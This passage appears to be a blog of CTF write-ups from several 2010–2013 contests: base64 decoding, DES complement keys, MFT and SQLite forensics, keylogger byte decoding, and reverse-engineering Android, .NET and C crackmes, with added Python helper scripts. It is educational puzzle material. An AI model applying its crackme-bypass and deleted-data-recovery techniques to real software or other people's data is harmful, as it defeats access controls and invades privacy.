000000e0 49 47 39 6d 49 48 52 6f 5a 53 42 7a 5a 57 4e 76 |IG9mIHRoZSBzZWNv|
000000f0 62 6d 51 67 64 47 46 7a 61 79 34 4b |bmQgdGFzay4K|



contact@0x41414141.com

Further Analysis:
After some further analysis, I figured out that it's just a base64-encoded string, so I extracted the string from the ASCII column of the dump.

So I made a simple Python script and got back:
Nice start. Sure hope you think it was stupid simple.

Send an e-mail to foo@challenge.0x41414141.com. A reply will be sent to the reply-to address containing the URL of the second task.

Sending an email to the above address, I got the next challenge awaiting me. :D

Attached is the simple Python script.
pyBase64Decode.py

cheers
0x4a61636f62

CodeGate Qualifiers CTF 2012 : Misc #2 - 200 Points

Given Hints:
Alice wants to send a message to Bob in secure way.

Alice encrypted a plaintext PA = "IMISSYOU" = 0x494D495353594F55 by using DES
and obtained ciphertext CA = 0xFA26ED1833264435.

Alice sent the ciphertext CA and the secret key to Bob. The secret key was encrypted
by converting each of its letters to a pair of digits giving its position in the
typewriter keyboard. More precisely, the following table is used.

1 2 3 4 5 6 7 8 9 0
---------------------------------------------------
1 | Q W E R T Y U I O P
2 | A S D F G H J K L
3 | Z X C V B N M

In this manner, 'A' is converted to 21, 'B' to 35, etc. In transmission, all of the
first digits were lost and the received secret key resulted in the pairs:

?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5

After a few minutes, Bob recovered the secret key and smiled. Bob decided to reply in the same way.

Bob encrypts a plaintext PB = 0xB6B2B6ACACA6B0AA by using DES and obtained ciphertext CB = 0x05D912E7CCD9BBCA.

What is the secret key which Bob used? (0x????????????????) (Bob's secret key is different from Alice's secret key)

Identifying File:
We first begin by recovering the secret key. By referencing the table above, these are the possible letters for each pair:
?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5
------------------------
 I  O  O  R  E  T  O  T
 K  L  L  F  D  G  L  G
          V  C  B     B

From the list of possible letters, we can deduce the secret key to be
I L O V E B O B

We confirm this secret key to be correct by testing it out using DES.
Where do we proceed from here? We know the plaintexts PA and PB, the ciphertexts CA and CB, and also the secret key SA. How are we going to determine the secret key SB with the information gathered? With some research and thinking, we know:
This CTF session lasts for only 36 hours, and several teams managed to solve this challenge within hours.
With the available information, we would have to conduct a "known plaintext attack", which needs days of brute force. In view of practicality, this is clearly not the correct direction to head in to solve the challenge.

Let's take another look at the available information:
Plaintext Ciphertext Secret Key
------------------------------------------------------------------------
Alice | 494D495353594F55 FA26ED1833264435 494C4F5645424F42 (ILOVEBOB)
Bob | B6B2B6ACACA6B0AA 05D912E7CCD9BBCA

If we look close enough at the information above, we can make out some noticeable patterns from them => 0x5 in PA becomes 0xA in PB, 0x3 in PA becomes 0xC in PB, 0x2 in CA becomes 0xD in CB, etc. As the list grows, we can actually deduce a trait:
4 -> B (0100 -> 1011)   9 -> 6 (1001 -> 0110)   D -> 2 (1101 -> 0010)
5 -> A (0101 -> 1010)   3 -> C (0011 -> 1100)   F -> 0 (1111 -> 0000)
A -> 5 (1010 -> 0101)   2 -> D (0010 -> 1101)   6 -> 9 (0110 -> 1001)
E -> 1 (1110 -> 0001)   1 -> E (0001 -> 1110)   8 -> 7 (1000 -> 0111)

The common trait among the hex characters is the toggling of bits, which are shown in brackets. For bit manipulation, we can use the exclusive-OR operator (^) to achieve this toggling of bits action.

Let's toggle the bits in the secret key SA to obtain the secret key SB, and use DES to verify it:
494C4F5645424F42
^FFFFFFFFFFFFFFFF
----------------
B6B3B0A9BABDB0BD
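The pattern exploited above is the DES complementation property, stated here as an added note that is not part of the original writeup. Writing $\bar{x}$ for the bitwise complement of $x$:

$$\mathrm{DES}_{\bar K}(\bar P) = \overline{\mathrm{DES}_K(P)}$$

The reason is that every subkey $K_i$ is a bit permutation of $K$, so $\bar K$ yields $\bar K_i$, and the round function $f(R, K_i) = P\big(S(E(R) \oplus K_i)\big)$ only uses the key through an XOR with the expanded half-block $E(R)$, where $E$ merely copies bits. Hence

$$f(\bar R, \bar K_i) = P\big(S(\overline{E(R)} \oplus \overline{K_i})\big) = P\big(S(E(R) \oplus K_i)\big) = f(R, K_i),$$

and with $L_i = R_{i-1}$, $R_i = L_{i-1} \oplus f(R_{i-1}, K_i)$ each round maps complemented inputs to complemented outputs; the initial and final permutations preserve complements as well. Applied to this challenge, $P_B = \bar{P_A}$ and $C_B = \bar{C_A}$, so

$$S_B = \bar{S_A} = S_A \oplus \mathtt{FFFFFFFFFFFFFFFF} = \mathtt{B6B3B0A9BABDB0BD}.$$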

Final Solution:
Flag: **B6B3B0A9BABDB0BD**

cheers
Mr.D

CodeGate CTF 2012 Forensics 400

Hints given to us:
In Energy corporate X which is located in Seoul, APT(Advanced Persistent Threat) was occurred.
For 6 months, Attacker A has stolen critical information with an elaborate attack.
Attacker A exerted great effort to remove his all traces such as malicious file, prefetch, registry and event logs for the period of attacking,
so it was hard for Energy Corporate X to find an attacking path.
However IU who is Forensic expert can find the traces of the malicious files Attacker A used by analyzing MFT(Master File Table).
What time malicious file was created? The time is based on Korea Standard Time(UTC +09:00)
Answer: YYYY-MM-DDThh:mm:ss.sTZD
(TZD : +hh:mm or -hh:mm). Calculate down to seven decimal points. (e.g. 2012-02-25T10:20:33.1234567+??:??)
Download : 9327ACF33377C03DAFA46CE98B5DB4D0

This is a mirror of the original file:
9327ACF33377C03DAFA46CE98B5DB4D0.zip

Recommended Tools:
analyzeMFT V1.7 (http://code.google.com/p/opensourceforensics/downloads/detail?name=analyzeMFT-V1-7-x86.exe&can=2&q=)

Analysing the File:
Using TrID, I know that it's a 7-zip file. When I extracted the contents, I got a $MFT file.
Could this be an MFT file?
Further checks on this file proved that it is indeed an MFT file.

OK, so I used analyzeMFT on this file.
Using the following command, I was able to extract valuable information from the MFT:
analyzeMFT-V1-7-x86.exe -f $MFT -o forensics400.csv

Since the objective is to find the malicious file, which might have been deleted, I did a quick search for "recycle" and ".exe" in forensics400.csv.
I found 2 files in the recycle bin, /$Recycle.Bin/cc.dat and /$Recycle.Bin/r32.exe.
As the hint was about a malicious file, maybe I should focus on r32.exe first, as shown in the image below.



Solving the Puzzle:
Using all the information that we have gathered thus far, and the hints given:
Answer: YYYY-MM-DDThh:mm:ss.sTZD
(TZD : +hh:mm or -hh:mm). Calculate down to seven decimal points. (e.g. 2012-02-25T10:20:33.1234567+??:??)

"2012-02-23T01:39:18.897461" seems like the answer. But wait, it requires 7 decimal places. Maybe I should add a 0 behind it.
However, using the above key, I got it wrong. After some reading up, it seems the fault is due to analyzeMFT:
it auto-corrects the time to my timezone (+8), whereas the challenge requires me to be in the +9 timezone.
So either I change my system time to +9 or I just add 1 more hour to it.
Being the lazy pig that I am, I chose the latter option.
The correct key for Forensics 400 is: 2012-02-23T02:39:18.8974610
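The timestamp handling, as an added Python example (my own code, not analyzeMFT's): NTFS stores MFT times as 100 ns ticks since 1601-01-01 UTC, which is where the seventh decimal digit comes from, so the conversion is done on ticks and rendered in the challenge's form directly in the wanted offset. naive_to_filetime re-interprets a tool's tz-less output in the offset the tool assumed, which is the +8 to +9 correction the page made by hand.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
KST = timezone(timedelta(hours=9))


def filetime_to_iso(ticks: int, tz: timezone = KST) -> str:
    """Render a FILETIME (100 ns ticks since 1601-01-01 UTC) as
    YYYY-MM-DDThh:mm:ss.sssssss+hh:mm, keeping all seven fractional digits."""
    whole_us, sub_us = divmod(ticks, 10)  # datetime only holds microseconds
    dt = (FILETIME_EPOCH + timedelta(microseconds=whole_us)).astimezone(tz)
    offset = dt.utcoffset()
    sign = "+" if offset >= timedelta(0) else "-"
    total_min = abs(int(offset.total_seconds())) // 60
    return (dt.strftime("%Y-%m-%dT%H:%M:%S")
            + f".{dt.microsecond:06d}{sub_us}"
            + f"{sign}{total_min // 60:02d}:{total_min % 60:02d}")


def naive_to_filetime(text: str, utc_hours: int) -> int:
    """Interpret a tool's tz-less 'YYYY-MM-DDThh:mm:ss.ffffff' output in the UTC offset
    the tool silently applied, and return the underlying FILETIME ticks."""
    tz = timezone(timedelta(hours=utc_hours))
    dt = datetime.strptime(text, "%Y-%m-%dT%H:%M:%S.%f").replace(tzinfo=tz)
    delta = dt - FILETIME_EPOCH  # integer arithmetic: no float rounding over 400 years
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def rerender(tool_output: str, tool_hours: int, wanted_hours: int) -> str:
    """The page's correction: a timestamp printed in +08:00 by the tool, wanted in +09:00."""
    return filetime_to_iso(naive_to_filetime(tool_output, tool_hours),
                           timezone(timedelta(hours=wanted_hours)))


if __name__ == "__main__":
    print(rerender("2012-02-23T01:39:18.897461", 8, 9))
```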

cheers
0x4a61636f62

CodeGate2012 Forensics300

Hints given to us:
IU is investigating the system which was contaminated by malicious code.
As a result of analyzing TimeLine, it seems to be contaminated after February 9th 2012.
Contaminating path would be from visiting Web page. IU analyses various user traces of Internet, however IU can't find malicious URL.
Maybe traces would be removed, when it was contaminated. Find correct malicious URL and the time it was contaminated. (cf. Remove http(s)://)
The time is based on Korea Standard Time(UTC +09:00).

Answer: malicious_URL|YYYY-MM-DDThh:mm:ss
('|' is just a character)

Download : 05D659000025F95CD07B2B36E94B0C15

This is a mirror of the original file:
05D659000025F95CD07B2B36E94B0C15.zip

Recommended Tools:
SQLite Browser (sqlitebrowser.sourceforge.net/)
DCode (http://www.digital-detective.co.uk/freetools/decode.asp)
Any hex viewer / editor or even notepad++

Analysing the File:
When I first analysed the file, TrID said it's a 7-zip file. I quickly extracted the contents and found that it's a "Cookies" file located deep at \Users\proneer\AppData\Local\Google\Chrome\User Data\Default
This probably means it's a SQLite file. Reading the hints given to us, and knowing it's a SQLite file, the SQLite website has the relevant information: http://sqlite.org/faq.html#q20
A record can be deleted from the database and still be present; it's just not viewable with normal SQLite tools.
So how do we find that data, and how do we distinguish it from the non-deleted data? When you delete a record, the space allocated to the record gets added to a free-list.

In other words, the size of the database doesn't get any smaller with record removal, but the space is marked as available for future records.
According to the FAQ in SQLite website, "If SQLITE_SECURE_DELETE is not used and VACUUM has not been run, then some of the deleted content might still be in the database file, in areas marked for reuse."
So attackers, please run vacuum if you really want to delete your entry. :P

OK, let's open the file in Notepad++. Since the objective is to find the malicious URL, let's do a quick search for .net, .com, .org and .kr and compare the hits with all the entries found with SQLite Browser.
Once we did that, we found an extra entry, as indicated in the image below, test.wargame.krutma134301300.282793704.1328799447.1328799457.1328799457.10 , that was not shown by SQLite Browser.



Solving the Puzzle:
But how do we know the time? According to http://www.randycullom.com/chatterbox/archives/2008/10/google_analytic.html, the __utma value is six dot-separated numbers: domain hash, visitor id, time of first visit, time of previous visit, time of current visit and session count.

The 3rd number after utma, 1328799447, is therefore the timestamp of the user's first visit/session, stored as Unix epoch seconds (UTC).

Feeding 1328799447 into DCode gives Thu, 09 February 2012 23:57:27 +0900, as shown in the image below (the raw value is 2012-02-09 14:57:27 UTC; adding the +09:00 offset for Korea Standard Time gives 23:57:27).



So using all the information gathered thus far, the correct key for Forensics 300 is: test.wargame.kr|2012-02-09T23:57:27
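As an added example (not part of the original write-up), the following Python script reproduces the whole workflow offline: it builds a constructed Chrome-like cookies table, deletes the test.wargame.kr row the way an attacker cleaning up would, carves __utma-shaped strings out of the raw file bytes, diffs them against what a normal SELECT returns, and converts the first-visit timestamp to KST in the answer format. The table layout, the other hosts and their cookie values are assumptions for the demo; only the test.wargame.kr value is the one from the challenge. Running the same thing with PRAGMA secure_delete = ON shows why the FAQ's caveat matters.

```python
"""Carve deleted __utma cookies out of a Chrome-style SQLite file and decode them."""
import re
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

KST = timezone(timedelta(hours=9))
# __utma value: domain_hash.visitor_id.first_visit.previous_visit.current_visit.session_count
UTMA_RE = re.compile(rb"\d{1,10}\.\d{1,10}\.\d{9,10}\.\d{9,10}\.\d{9,10}\.\d{1,5}")


def parse_utma(value: str) -> dict:
    """Split a __utma value into named fields (timestamps are Unix epoch seconds, UTC)."""
    names = ("domain_hash", "visitor_id", "first_visit", "previous_visit",
             "current_visit", "session_count")
    fields = value.split(".")
    if len(fields) != 6:
        raise ValueError("a __utma value has six dot-separated numbers")
    return dict(zip(names, map(int, fields)))


def epoch_to_kst(ts: int) -> str:
    """Render an epoch timestamp in the answer format, Korea Standard Time (UTC+09:00)."""
    return datetime.fromtimestamp(ts, tz=KST).strftime("%Y-%m-%dT%H:%M:%S")


def make_cookie_db(path: str, secure_delete: bool) -> None:
    """Constructed, Chrome-like cookies table (assumed layout); one row is then deleted."""
    conn = sqlite3.connect(path)
    conn.execute(f"PRAGMA secure_delete = {'ON' if secure_delete else 'OFF'}")
    conn.execute("CREATE TABLE cookies (host_key TEXT, name TEXT, value TEXT)")
    conn.executemany("INSERT INTO cookies VALUES (?, ?, ?)", [
        ("www.google.com", "__utma", "173272373.1234567890.1328700000.1328700000.1328700000.1"),
        ("test.wargame.kr", "__utma", "134301300.282793704.1328799447.1328799457.1328799457.10"),
        ("wargame.kr", "PHPSESSID", "0123456789abcdef"),
    ])
    conn.execute("DELETE FROM cookies WHERE host_key = 'test.wargame.kr'")  # the "cleanup"
    conn.commit()
    conn.close()


def carve_utma(path: str) -> set:
    """Every __utma-shaped string in the raw file: live rows and freed space alike."""
    data = Path(path).read_bytes()
    return {m.group(0).decode() for m in UTMA_RE.finditer(data)}


def live_utma(path: str) -> set:
    """What a normal SQLite client (SQLite Browser, sqlite3) sees."""
    conn = sqlite3.connect(path)
    rows = conn.execute("SELECT value FROM cookies WHERE name = '__utma'").fetchall()
    conn.close()
    return {r[0] for r in rows}


def find_deleted(path: str) -> list:
    """Values present in the raw bytes but absent from the query: the deleted cookies."""
    return sorted(carve_utma(path) - live_utma(path))


def demo(secure_delete: bool = False) -> list:
    """Build the demo database in a temp dir and return the carved-but-deleted values."""
    with tempfile.TemporaryDirectory() as tmp:
        db = str(Path(tmp) / "Cookies")
        make_cookie_db(db, secure_delete)
        return find_deleted(db)


def answer(host: str, utma_value: str) -> str:
    """Compose the challenge's answer format from a host and its __utma value."""
    first = parse_utma(utma_value)["first_visit"]
    return f"{host}|{epoch_to_kst(first)}"


if __name__ == "__main__":
    print(demo(False))   # the deleted cookie is still carveable
    print(demo(True))    # with secure_delete the freed bytes are zeroed
    print(answer("test.wargame.kr", "134301300.282793704.1328799447.1328799457.1328799457.10"))
```

The carve works on the file bytes, not through SQLite, which is the whole point: a freed cell keeps its payload until the page is reused, VACUUM rewrites the file, or secure_delete zeroes it on deletion.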

cheers
0x4a61636f62

Hack.Lu CTF 2010 : Chip Forensic



Hints given to us:
Your co-worker has found a suspicious USB device on his desk, but wouldn't dare trying to plug it in:

Instead he removed the case and found some flash memory on the board. After having removed the memory chip and used up all his electrical engineering skills he finally found out what was stored. Now he asks you to find out how to interpret the chip's memory:

0B 12 0F 0F 1C 4A 4C 0D 4D 15 12 0A 08 15
gold: 200 +3 (1st), +2 (2nd), +1 (3rd)


Recommended Tools:
1. Google-Fu - Don't leave home without it.

More Information:
There should be an image showing the USB device the co-worker found, but as I don't have a copy of it you can't do a reverse image search on Google to identify the device.


After some time googling for the image, I found out that it's a USB keylogger.
So the bytes are probably the key codes the keylogger captured from a USB keyboard, just like a software keylogger on Windows records scan codes.
Again, let's google to check whether USB keyboards use a separate set of codes (they do: USB HID usage IDs rather than PS/2 scan codes).

Using the search term "USB-keyboard scan-codes", the top hit, http://www.win.tue.nl/~aeb/linux/kbd/scancodes-14.html, contains the matching table.


Solution:
Using the newly acquired table, the bytes decode as follows (the values are USB HID usage IDs: 0x04-0x1D are the letters a-z, 0x4A is Home, 0x4C is Delete and 0x4D is End).
0B 12 0F 0F 1C 4A 4C 0D 4D 15 12 0A 08 15
H  O  L  L  Y  Home Delete J End R  O  G  E  R

Replaying the keystrokes with the cursor in mind: HOLLY is typed, Home moves the cursor to the start, Delete removes the H, J is inserted in its place, End moves the cursor back to the end, and ROGER is typed.

Result:
JOLLYROGER

Bingo, challenge completed. :D
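As an added example (mine, not the write-up's), this Python decoder maps the raw bytes to USB HID usage IDs and then replays them against an edit buffer that understands Home, End, Delete, Backspace and the arrow keys, so the cursor movement is applied automatically instead of by hand. The dump contains no modifier bytes, so case is not recoverable and the output is lower-case; the set of editing keys handled is my choice and covers what such a dump commonly contains.

```python
"""Replay a USB HID keyboard capture, honouring cursor movement and deletion."""
# Usage IDs from the HID Usage Tables, keyboard/keypad page (0x07).
HID_KEYS = {0x04 + i: chr(ord("a") + i) for i in range(26)}          # 0x04..0x1D = a..z
HID_KEYS.update({0x1E + i: "1234567890"[i] for i in range(10)})      # 0x1E..0x27 = 1..9,0
HID_KEYS.update({0x28: "ENTER", 0x2A: "BACKSPACE", 0x2C: " ", 0x4A: "HOME",
                 0x4C: "DELETE", 0x4D: "END", 0x4F: "RIGHT", 0x50: "LEFT"})


def decode_keys(dump: str) -> list:
    """Map each byte of a hex dump such as '0B 12 0F' to its key name."""
    return [HID_KEYS.get(int(h, 16), f"<{int(h, 16):02X}>") for h in dump.split()]


def replay(keys: list) -> str:
    """Apply the keystrokes to an edit buffer instead of just concatenating them."""
    buf, cur = [], 0
    for k in keys:
        if k == "HOME":
            cur = 0
        elif k == "END":
            cur = len(buf)
        elif k == "LEFT":
            cur = max(0, cur - 1)
        elif k == "RIGHT":
            cur = min(len(buf), cur + 1)
        elif k == "DELETE":          # removes the character under the cursor
            if cur < len(buf):
                del buf[cur]
        elif k == "BACKSPACE":       # removes the character before the cursor
            if cur > 0:
                cur -= 1
                del buf[cur]
        elif k == "ENTER":
            buf.insert(cur, "\n")
            cur += 1
        elif len(k) == 1:            # printable key: insert at the cursor
            buf.insert(cur, k)
            cur += 1
        # unknown usage IDs (rendered as <XX>) are ignored
    return "".join(buf)


def solve(dump: str) -> str:
    """Decode and replay a dump; the result is what ended up in the text field."""
    return replay(decode_keys(dump))


if __name__ == "__main__":
    CHIP = "0B 12 0F 0F 1C 4A 4C 0D 4D 15 12 0A 08 15"   # the bytes from the chip
    print(decode_keys(CHIP))
    print(solve(CHIP).upper())
```

Naively concatenating the printable keys would give "hollyjroger"; only the replay through the cursor model yields the real key.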

cheers
0x4a61636f62

Hack.Lu CTF 2010 : Like skies that are so blue



Hints given to us:
Sometime even pirates have a lazy sunday...

download - Since the original image is missing, I've uploaded a mirror copy of it here.



gold: 100 +3 (1st), +2 (2nd), +1 (3rd)

Recommended Tools:
1. Any photo editor
2. Brains

Logic behind this:
Initially, I wasted too much time trying all sorts of tools to see whether any steganography was used. I even checked the metadata and properties of the file, but without success.

But after some thought: since it's just a 100 points challenge, it should not be too difficult, right?

Could it be, like those old Defcon challenges, that the MD5 of the file is the key?
Bingo, the MD5 of the image file, 032c49411912397eea2a7d906dab5f7e, is the answer.

Now that I've solved this by accident, there must still be something in the image that gives this clue.
After spending some more time on it, it turns out that if you fill the image with another colour (I used black this time round, as it's the default in most image editors),

you will see the following image, which is the essential clue. :P



Solution:
032c49411912397eea2a7d906dab5f7e
Hooray, challenge completed. :D

cheers
0x4a61636f62

Hack.Lu CTF 2011 Space Station 0xA1EA512A



Hints given to us:
Space Station 0xA1EA512A

You have seen a deserted space station. Your task is to enter it. The first barrier is the access system. But you can find a module with the application on it. Here is the file:

https://ctf.hack.lu/files/0xA1EA512A.apk

What is the key?

(There is also station B. Station B is the advanced one.)

Here is a copy of the apk file.
0xA1EA512A.zip

Recommended Tools:
1. android emulator (http://developer.android.com/sdk/index.html)

2. dex-translator (http://code.google.com/p/dex2jar/downloads/detail?name=dex-translator-0.0.9.3.zip&can=2&q=) - convert android apps to Java jar file

3. DJ Java Decompiler (http://members.fortunecity.com/neshkov/dj.html) - java decompiler

Key Logic:
if(k == (j1 ^ (0x67782aef ^ j1 ^ j - 1422) ^ j - 2))
    textview.append("That's OK. Come in.");
else
    textview.append("No, that is not OK!");

where
    k = inputs that user type
    j = 0x67782aef + 2
    j1 can be 12 from the code

More Information:
Decompiling the file reveals 2 java files in which only the AccessControl.java is of interest to us.
My approach in finding the condition in gaining access is to find the line where it indicates that you are “authorized”.
In this puzzle that will be “That’s OK. Come in.”
The if statement has a total of 3 unknown variables. After tracing upwards, you will discover that k is actually what the user typed in the text box, j is defined as 0x67782aef + 2, and j1 can be either 12 or 3L * (16 + (0x67782aef - 2)) - 0x57bac1daL - 2L;

Let's take the easy way out by letting j1 be 12. (It does not actually matter which value j1 takes: in Java the subtractions bind tighter than ^, so the condition reads k == j1 ^ 0x67782aef ^ j1 ^ (j - 1422) ^ (j - 2); j1 ^ j1 cancels and (j - 2) ^ 0x67782aef is 0, leaving k = j - 1422.) We write a one-liner PHP script and run it, then type the result into the emulator and test if it works.

Solution:
Run a php script =D


Result:
0x67782563
Screenshot:


Using the answer, we solved the Android CrackMe. :D
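As an added example (not the author's PHP one-liner), this Python script evaluates the decompiled condition with Java's 32-bit int semantics and checks the derived key against both j1 candidates, which demonstrates that j1 cancels out of the XOR chain. The int-wrapping helper and the function names are my own.

```python
"""Java-int-exact evaluation of the Space Station access check, showing j1 cancels out."""


def to_int32(x: int) -> int:
    """Wrap a Python int to Java's signed 32-bit int."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x


def access_ok(k: int, j1: int) -> bool:
    """The decompiled condition with Java precedence: '-' binds tighter than '^'."""
    j = to_int32(0x67782aef + 2)
    rhs = j1 ^ (0x67782aef ^ j1 ^ to_int32(j - 1422)) ^ to_int32(j - 2)
    return to_int32(k) == to_int32(rhs)


def derive_key() -> int:
    """Algebra: j1 ^ j1 = 0 and (j - 2) ^ 0x67782aef = 0, so k = j - 1422."""
    j = to_int32(0x67782aef + 2)
    return to_int32(j - 1422)


# Both values the decompiled code can assign to j1 (the second one is a Java long).
J1_CANDIDATES = [12, 3 * (16 + (0x67782aef - 2)) - 0x57bac1da - 2]

if __name__ == "__main__":
    k = derive_key()
    print(hex(k), all(access_ok(k, j1) for j1 in J1_CANDIDATES))
```

Because j1 drops out, any value of j1 accepts the same key; the only thing that matters is reading the operator precedence correctly.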

cheers
Elucidator

Wednesday, May 29, 2013

HackYou CTF 2012 : Binary - OpenSource


Hints given to us:


Choosing "Open-Source", we got a code.c file. Inside this .c file, we got the following source code.

#include <stdio.h>
#include <stdlib.h>   /* atoi and exit are declared here; the listing as given omitted it */
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

Recommended Tools:
Brains
C Compiler

Solution to this challenge:
I've started solving this by analysing the source code.

...
if (argc != 4) {
...

Looking at the above code snippet, argc must be 4, so the program needs exactly 3 arguments (argv[0] is the program name itself).


...
unsigned int first = atoi(argv[1]);
if (first != 0xcafe) {
    printf("you are wrong, sorry.\n");
    exit(2);
}
...

Now, the first argument is converted with atoi and stored in the unsigned int first.
Then the value of first is compared with 0xcafe.
0xcafe is hexadecimal for 51966, so argv[1] must be the decimal string 51966.
In case you are wondering why the decimal form is required: atoi does not understand a 0x prefix; it stops at the first non-digit, so atoi("0xcafe") returns 0. See the documentation of atoi.

...
unsigned int second = atoi(argv[2]);
if (second % 5 == 3 || second % 17 != 8) {
    printf("ha, you won't get it!\n");
    exit(3);
}
...

Now, let's take a look at the 2nd argument.
It is converted with atoi like the 1st argument and stored in the unsigned int second.
The value we want must leave a remainder of 8 when divided by 17, and must not leave a remainder of 3 when divided by 5.
Let's satisfy the 17 condition first: the candidates are 8, 25, 42, 59, ... (8 + 17n).
8 fails the other check (8 % 5 = 3), so try the next candidate, 25 = 17 + 8.
25 % 5 = 0, which is not 3, so 25 passes both checks.
Thus argv[2] can be 25. Any other value of the form 8 + 17n whose remainder mod 5 is not 3 works too, and since the hash only uses second % 17, all of them produce the same key.

...
if (strcmp("h4cky0u", argv[3])) {
    printf("so close, dude!\n");
    exit(4);
}
....

Ok, looking at the documentation for strcmp.
We know that argv[3] must be h4cky0u

Now, you can either compile the above source code and feed in the arguments or you can manually calculate it.
I chose the latter option.

unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
printf("Get your key: ");
printf("%x\n", hash);

Substituting the values we have found:
51966 * 31337 + (25 % 17) * 11 + 7 - 1615810207
= 1628458542 + 88 + 7 - 1615810207
= 12648430

The hash is printed with %x, so convert 12648430 to hexadecimal with calc.
The key is C0FFEE (the program prints it as c0ffee).
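As an added example (not from the original post), this Python emulation of code.c mirrors C's atoi and unsigned 32-bit arithmetic, which makes the two traps visible: atoi("0xcafe") is 0, and every second of the form 8 + 17n (except those with remainder 3 mod 5) yields the same key. The function names and the argv lists are my own constructions.

```python
"""Emulate code.c with C semantics (atoi quirks, unsigned 32-bit arithmetic) and solve it."""
import re

M32 = 0xFFFFFFFF


def c_atoi(s: str) -> int:
    """atoi: optional whitespace and sign, then digits; stops at the first non-digit."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def run(argv: list) -> tuple:
    """Return (exit code, message) as the binary would, given a full argv."""
    if len(argv) != 4:
        return 1, "what?"
    first = c_atoi(argv[1]) & M32            # unsigned int first = atoi(argv[1]);
    if first != 0xCAFE:
        return 2, "you are wrong, sorry."
    second = c_atoi(argv[2]) & M32           # unsigned, so a negative input wraps
    if second % 5 == 3 or second % 17 != 8:
        return 3, "ha, you won't get it!"
    if argv[3] != "h4cky0u":                 # strcmp(...) != 0
        return 4, "so close, dude!"
    h = (first * 31337 + (second % 17) * 11 + len(argv[3]) - 1615810207) & M32
    return 0, f"Get your key: {h:x}"


def valid_seconds(limit: int) -> list:
    """Every value below limit that passes both modulus checks."""
    return [s for s in range(limit) if s % 17 == 8 and s % 5 != 3]


if __name__ == "__main__":
    print(run(["./code", "0xcafe", "25", "h4cky0u"]))   # atoi stops at 'x': exit 2
    print(run(["./code", "51966", "25", "h4cky0u"]))
    print(valid_seconds(100))
```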

cheers,
0x4a61636f62

pCTF 2011 : Mission 6 - Fun with Numb3rs (100 Points)


Hints given to us:
Uh oh… This door is protected with number scroll authenticator. There's "powered by .NETv4" sign.
Find out the combination and get the key!

These are the original files:
D573190633309f8a930bccbd199a16a4564c35fb.zip
Readme_Fun_with_Numb3rs.txt

Recommended Tools:
Reflector Decompiler (http://www.reflector.net/); Decompile .net
Use SandBoxie (http://www.sandboxie.com/) to get around the 30-day trial

Key Logic behind cracking the mission:
if ((((((num + num4) - num2) + ((num * num) * num2)) - num3) == ((num2 * ((num3 * 0x22) + (num5 - num))) + 0x1d40)) && (num > 0x4d))

Brute force the logic:
// a = num, b = num2, c = num3; from the condition, num4 = b*c and num5 = 3*a.
// 0x4d = 77 (so a starts at 78), 0x22 = 34, 0x1d40 = 7488.
for (int a = 78; a <= 255; a++) {
    for (int b = 0; b <= 255; b++) {
        for (int c = 0; c <= 255; c++) {
            if ((a + b*c) - b + ((a*a*b) - c) == (b * ((c * 34) + ((3*a) - a))) + 7488) {
                System.out.println("a : " + a);
                System.out.println("b : " + b);
                System.out.println("c : " + c);
            }
        }
    }
}



Answer:
You will get the following results.
a : 89
b : 144
c : 233

Making use of the numbers
Now that we have the 3 numbers, let's use them on the binary by adjusting the sliders like this.



After adjusting the sliders, you will get this messagebox, which is the key. :D



I have also attached the source code for the brute-force application.
File:Crack.java


cheers
Elucidator

NuitDuHack2013 Crackme 100 (Huge.js)


A gigantic JavaScript file is given to us (about 25 MB of text)
huge.zip

Recommended Tools:
- Notepad++
- Firefox Browser

Opening the file in Notepad++, we can see that it contains a function called "x" and a very long run of hexadecimal characters.
The hexadecimal characters are most likely the encoded JavaScript code and the function "x" is the decoding function.

In order to decode the JavaScript, we can create an HTML file that includes the x function, calls it on the hexadecimal string and writes the result to the page.
Something like this


Load the above html file into your browser (I used Firefox) and it should show you the decoded javascript code like this


Wait a minute, this looks exactly like the encoded code at the beginning of the puzzle.
This is because the javascript code is encoded multiple times and we need to decode it multiple times in order to get the original code
Copy the hexadecimal characters from the browser output and paste it back into the "abc" variable in the html file.
Reload the html file in the browser to run the decoding a second time.
Repeat this for 6 times and you will get the final actual javascript code


The actual code consists of multiple functions that perform hashing on the password.
There is also a function "unlock" which basically checks for a certain password hash.
Analyzing this function, we learn that the password is 5 characters long and that it can only contain characters from a certain list of valid characters.
With that, we can write a brute force function to brute force the password out


Run the brute force script in a browser and after awhile, it will give you the flag
(Do note that the brute force will take a while; the browser may prompt you that the script is unresponsive. If it does, do not stop the script: ignore the warning or wait for it to complete.)
(For this, I recommend Firefox, as it has a "Don't ask me again" option, which saves you a lot of waiting and clicking frustration.)
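As an added example (not the author's HTML harness, whose x() function I do not have), this Python snippet assumes each layer is the plain hex encoding of the previous one and peels layers until the result stops looking like hex-encoded ASCII text, returning the layer count instead of requiring six manual copy-and-reload rounds. wrap() is a constructed generator of such input so the script runs offline, and the JavaScript snippet it wraps is made up.

```python
"""Peel nested hex-encoding layers automatically instead of reloading the page six times."""
import re

HEX_ONLY = re.compile(r"^[0-9a-fA-F]+$")


def decode_layer(s: str) -> str:
    """One application of the assumed x(): hex pairs back to characters."""
    return bytes.fromhex(s).decode("latin-1")


def looks_like_text(s: str) -> bool:
    """ASCII, printable apart from the usual whitespace: what a decoded script should be."""
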